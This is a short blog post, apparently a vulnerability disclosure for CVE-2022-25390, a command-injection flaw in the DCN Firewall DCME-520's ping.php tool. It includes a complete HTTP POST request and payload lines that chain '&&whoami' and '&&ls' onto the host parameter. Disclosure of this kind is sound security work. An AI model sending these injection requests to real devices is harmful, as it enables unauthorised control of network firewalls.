Headline
CVE-2022-25390: DCN Firewall DCME-520 has a Command Execution vulnerability – Adminxe's Blog
DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.
**0x00 **Affected component(s)****
Affected:DCN Firewall DCME-520
Affected source code file:/www/function/system/tool/ping.php
**0x01 Vendor of the product(s) and **vulnerability type****
http://www.digitalchina.com/
Command Execution
**0x02 **Attack vector(s)****
Vulnerability file path ‘/function/system/tool/ping.php’,
the’ host ‘parameter passed in is not strictly filtered.
It is directly brought into the command line and bypassed by payload (& &),
resulting in a command execution vulnerability,
which can obtain server permissions.
0x03 Suggest
An issue was discovered in DCN Firewall DCME-520.
There is a Command Execution that can execute any harmful command on the serveron to control the server。
**0x04 **Source code analysis****
path:
/function/system/tool/ping.php
the’ host ‘parameter passed in is not strictly filtered.
It is directly brought into the command line and bypassed by payload (& &),
resulting in a command execution vulnerability.
Command Execution Packet:
POST /function/system/tool/ping.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 148
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/function/system/tool/ping.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UILanguage=2; PHPSESSID=62913043f1317aec7e2b041dd895ba4b
Connection: close
dcn_test_a_120=525&dcn_test_b_120=283&dcn_test_c_120=790&dcn_test_d=_120&doing=ping&host=114.114.114.114%26%26whoami&proto=&count=1
payload:
host=114.114.114.114&&whoami
host=114.114.114.114&&ls
转载请注明:Adminxe’s Blog » DCN Firewall DCME-520 has a Command Execution vulnerability